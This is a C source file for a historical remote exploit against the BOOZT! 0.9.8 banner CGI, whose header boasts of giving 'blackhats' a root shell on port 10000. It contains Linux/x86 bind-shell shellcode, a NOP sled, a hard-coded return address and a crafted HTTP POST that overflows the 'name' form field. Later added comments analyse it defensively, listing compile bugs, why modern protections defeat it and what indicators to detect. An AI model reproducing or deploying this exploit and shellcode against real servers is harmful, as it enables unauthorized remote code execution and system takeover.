
  1. /* -----------------------------------------------------------------------
  2.  
  3.    BOOZT! Not so Standard 0.9.8 CGI vulnerability exploit
  4.    fixed/updated by BrainStorm - ElectronicSouls
  5.    now it's much more useful ;>
  6.  
  7.    Original Code by: Rafael San Miguel Carrasco - rsanmcar@alum.uax.es
  8.  
  9.    script kiddie enabled! .. this will give you a rootshell on port 10000
  10.    so this version isnt for admins its for blackhats! and kidz piss off!
  11.    this isnt widely used so nothing for kiddies anyway, since they cant own
  12.    100 systems with it =P ..
  13.  
  14.    greetz: ghQst,FreQ,it_fresh,SectorX,RobBbot,0x90,Resistor,Phantom,
  15.            divineint,rocsteele,websk8ter,nutsax,BuRn-X and all other
  16.            ElectronicSouls members - j00 r0ck =>
  17.  
  18.    -----------------------------------------------------------------------
  19. */
  20.  
  21.  
  22. #include <netinet/in.h>
  23.  
#define PORT 8080       /* target HTTP port; the same value is baked into the Host/Referer headers in main() */
#define BUFLEN 1597     /* size of the overflowing "name=" field; note it is not a multiple of 4 (see the fill loop in main()) */
#define RET 0xbffff297  /* hard-coded pre-ASLR Linux/x86 stack address; ties the payload to one specific target build and environment */
#define NOP 0x90        /* x86 NOP used for the sled */
  28.  
/*
 * Historical proof-of-concept for a stack buffer overflow in the BOOZT! 0.9.8
 * admin CGI (see file header).  Reviewed here from a defensive angle: what the
 * program actually sends, why it would not work against a current system, and
 * what a defender can detect.  The code is left exactly as found.
 *
 * Build note: only <netinet/in.h> is included, so printf/exit/strcpy/strcat/
 * strncat/strlen/socket/bzero/htons/inet_addr/connect/write/close are all
 * implicitly declared.  Compilers of the era tolerated that; C99-and-later
 * compilers treat a missing prototype as an error.
 *
 * @param argc  argument count; fewer than 2 prints usage and exits.
 * @param argv  argv[1] is the target IPv4 address, handed to inet_addr().
 * @return 0 after the request has been written; exit(-1) on any error.
 */
int main (int argc, char **argv)
{
       int sockfd,
                i,
             cont;

        struct sockaddr_in dest;

        int html_len = 15;   /* must equal the element count of html[15] below */

        char cgicontent[2048];   /* "name=" + buf + fixed form fields = 1776 bytes, fits with room to spare */
        char buf[BUFLEN];        /* value of the overflowing "name" form field */
        /*
         * Linux/x86 payload; the mnemonics on the right are the original
         * author's.  Per the closing banner it is meant to leave a shell
         * listening on TCP/10000.  Its length is taken with strlen() below,
         * i.e. the byte string is handled as an ordinary C string.
         */
        char shellcode[]=  "\x31\xc0"                   // xor     eax, eax
                           "\x31\xdb"                   // xor     ebx, ebx
                           "\x89\xe5"                   // mov     ebp, esp
                           "\x99"                       // cdq
                           "\xb0\x66"                   // mov     al, 102
                           "\x89\x5d\xfc"               // mov     [ebp-4], ebx
                           "\x43"                       // inc     ebx
                           "\x89\x5d\xf8"               // mov     [ebp-8], ebx
                           "\x43"                       // inc     ebx
                           "\x89\x5d\xf4"               // mov     [ebp-12], ebx
                           "\x4b"                       // dec     ebx
                           "\x8d\x4d\xf4"               // lea     ecx, [ebp-12]
                           "\xcd\x80"                   // int     80h
                           "\x89\x45\xf4"               // mov     [ebp-12], eax
                           "\x43"                       // inc     ebx
                           "\x66\x89\x5d\xec"           // mov     [ebp-20], bx
                           "\x66\xc7\x45\xee\x27\x10"   // mov     [ebp-18], word 4135
                           "\x89\x55\xf0"               // mov     [ebp-16], edx
                           "\x8d\x45\xec"               // lea     eax, [ebp-20]
                           "\x89\x45\xf8"               // mov     [ebp-8], eax
                           "\xc6\x45\xfc\x10"           // mov     [ebp-4], byte 16
                           "\xb2\x66"                   // mov     dl, 102
                           "\x89\xd0"                   // mov     eax, ed
                           "\x8d\x4d\xf4"               // lea     ecx, [ebp-12]
                           "\xcd\x80"                   // int     80h
                           "\x89\xd0"                   // mov     eax, edx
                           "\xb3\x04"                   // mov     bl, 4
                           "\xcd\x80"                   // int     80h
                           "\x43"                       // inc     ebx
                           "\x89\xd0"                   // mov     eax, edx
                           "\x99"                       // cdq
                           "\x89\x55\xf8"               // mov     [ebp-8], edx
                           "\x89\x55\xfc"               // mov     [ebp-4], edx
                           "\xcd\x80"                   // int     80h
                           "\x31\xc9"                   // xor     ecx, ecx
                           "\x89\xc3"                   // mov     ebx, eax
                           "\xb1\x03"                   // mov     cl, 3
                           "\xb0\x3f"                   // mov     al, 63
                           "\x49"                       // dec     ecx
                           "\xcd\x80"                   // int     80h
                           "\x41"                       // inc     ecx
                           "\xe2\xf8"                   // loop    -7
                           "\x52"                       // push    edx
                           "\x68\x6e\x2f\x73\x68"       // push    dword 68732f6eh
                           "\x68\x2f\x2f\x62\x69"       // push    dword 69622f2fh
                           "\x89\xe3"                   // mov     ebx, esp
                           "\x52"                       // push    edx
                           "\x53"                       // push    ebx
                           "\x89\xe1"                   // mov     ecx, esp
                           "\xb0\x0b"                   // mov     al, 11
                           "\xcd\x80";                  // int     80h

        /*
         * Raw HTTP/1.0 request headers.  Host and Referer are hard-coded to
         * 10.0.0.1:8080 and do NOT follow argv[1].  The fixed Referer path,
         * User-Agent and UA-OS strings make a straightforward IDS/WAF
         * signature for this tool.  Content-Length 1776 is exactly
         * 5 ("name=") + BUFLEN (1597) + the 174-byte field tail appended
         * below, i.e. the whole of cgicontent.
         */
        char *html[15] =
        {
                "POST /cgi-bin/boozt/admin/index.cgi HTTP/1.0\n",
                "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,*/*\n",
                "Referer: http://10.0.0.1:8080/cgi-bin/boozt/admin/index.cgi?section=5&input=1\n",
                "Accept-Language: en, de\n",
                "Content-Type: application/x-www-form-urlencoded\n",
                "UA-pixels: 640x480\n",
                "UA-color: color8\n",
                "UA-OS: Blackhat Leenux\n",
                "UA-CPU: x86\n",
                "User-Agent: Hackscape/1.0 (j00r asS gonna gets 0wned)\n",
                "Host: 10.0.0.1:8080\n",
                "Connection: Keep-Alive\n",
                "Content-Length: 1776\n",
                "Pragma: No-Cache\n",
                "\n",
        };

        if (argc < 2)
        {
                printf ("usage: %s <IP>\n", argv[0]);
                exit (-1);   /* exit status 255 */
        }

        printf ("\n-----------------------------------\n");
        printf ("   BOOZT! Not so Standard exploit    \n");
        printf (" (C) BrainStorm - ElectronicSouls    \n");
        printf ("-----------------------------------\n\n");
        /*
         * Fill buf with RET at a 4-byte stride.  BUFLEN (1597) is not a
         * multiple of 4, so the last iteration (i == 1596) stores sizeof(long)
         * bytes starting at buf[1596] and writes past the end of buf — undefined
         * behaviour on this program's own stack.  The cast is also an unaligned,
         * aliasing-violating store, and on LP64 long is 8 bytes, which widens
         * the overrun.
         */
        for (i = 0; i < BUFLEN; i+=4)*( (long *) &buf[i]) = RET;
        /* NOP sled over everything except the last 16 bytes; only those keep the RET pattern. */
        for (i = 0; i < (BUFLEN - 16); i++) buf[i] = NOP;
        cont = 0;
        /* Payload is placed immediately before those last 16 bytes; cont indexes the payload. */
        for (i = (BUFLEN - strlen (shellcode) - 16); i < (BUFLEN - 16); i++)
                  buf[i] = shellcode [cont++];
        strcpy (cgicontent, "name=");
        /*
         * buf carries no NUL terminator after the fills above, so strncat's
         * length bound (sizeof buf) is what stops the copy; strncat then
         * NUL-terminates cgicontent itself.
         */
        strncat (cgicontent, buf, sizeof (buf));
        /*
         * The literal below is shown split across two lines and with "§ion=5",
         * where "&section=5" is evidently intended (an "&sect;" entity rendering
         * artefact of the archive viewer); with "&section=5" the body is exactly
         * the 1776 bytes the Content-Length header declares.
         */
        strcat (cgicontent,"&target=&alt_text=&id_size=1&type=image&source=&source_path=Browse...&source_flash=&
source_flash_path=Browse...&script_name=&input=1§ion=5&sent=1&submit=Create+New+Banner");

        printf ("* Connecting ...\n");
        if ( (sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0)
        {
         perror ("socket");
         exit (-1);
        }
        bzero (&dest, sizeof (dest));
        dest.sin_family = AF_INET;
        dest.sin_port = htons (PORT);
        dest.sin_addr.s_addr = inet_addr (argv[1]);   /* inet_addr() failure (INADDR_NONE) is not checked */
        /* &dest is a struct sockaddr_in *, not struct sockaddr *: incompatible-pointer-type warning. */
        if (connect (sockfd, &dest, sizeof (dest)) < 0)
        {
         perror ("connect");
         exit (-1);
        }
        printf ("* Connected. sending data ...\n");
        for (i = 0; i < html_len; i++)
        {
         /*
          * write() returns ssize_t; comparing it with size_t strlen() converts
          * -1 to SIZE_MAX, so an outright write failure is NOT caught here —
          * only a short write is.  The cgicontent write below has the same flaw.
          */
         if (write (sockfd, html[i], strlen(html[i])) < strlen(html[i]))
        {
         perror ("write");
         exit (-1);
        }
        }
        if (write (sockfd, cgicontent, strlen(cgicontent)) < strlen(cgicontent))
        {
         perror ("write cgicontent");
         exit (-1);
        }
        if (close (sockfd) < 0)
        {
         perror ("close");
         exit (-1);
        }
        /*
         * No response is read; success is simply assumed.  A hard-coded RET,
         * a NOP sled and stack-resident code mean ASLR, a non-executable stack
         * or stack canaries on the target each break this on their own.  From
         * the defender's side, the over-long "name" field in the POST body and
         * a new listener on TCP/10000 under the web-server uid are the
         * indicators to alert on.
         */
        printf("now connect to port 10000 on the victim host..          \n");
        printf("if everything went well you should get a rootshell :> \n\n");
        printf("enjoy..\n");
        return 0;
}